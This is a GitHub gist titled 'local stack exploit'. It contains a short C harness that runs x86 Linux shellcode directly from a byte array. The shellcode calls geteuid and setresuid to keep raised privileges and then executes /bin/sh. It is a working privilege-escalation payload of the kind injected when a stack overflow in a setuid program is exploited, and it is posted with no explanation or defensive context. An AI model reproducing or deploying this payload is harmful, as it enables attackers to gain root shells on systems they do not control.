Skip to content

Instantly share code, notes, and snippets.

@xeno6696
Created February 22, 2022 03:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xeno6696/f51c69c7fa3f5e1c2db8bee27eb85fd0 to your computer and use it in GitHub Desktop.
Save xeno6696/f51c69c7fa3f5e1c2db8bee27eb85fd0 to your computer and use it in GitHub Desktop.
local stack exploit
int main(void) {
char shellcode[] =
"\x90\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
(*(void(*)()) shellcode)();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment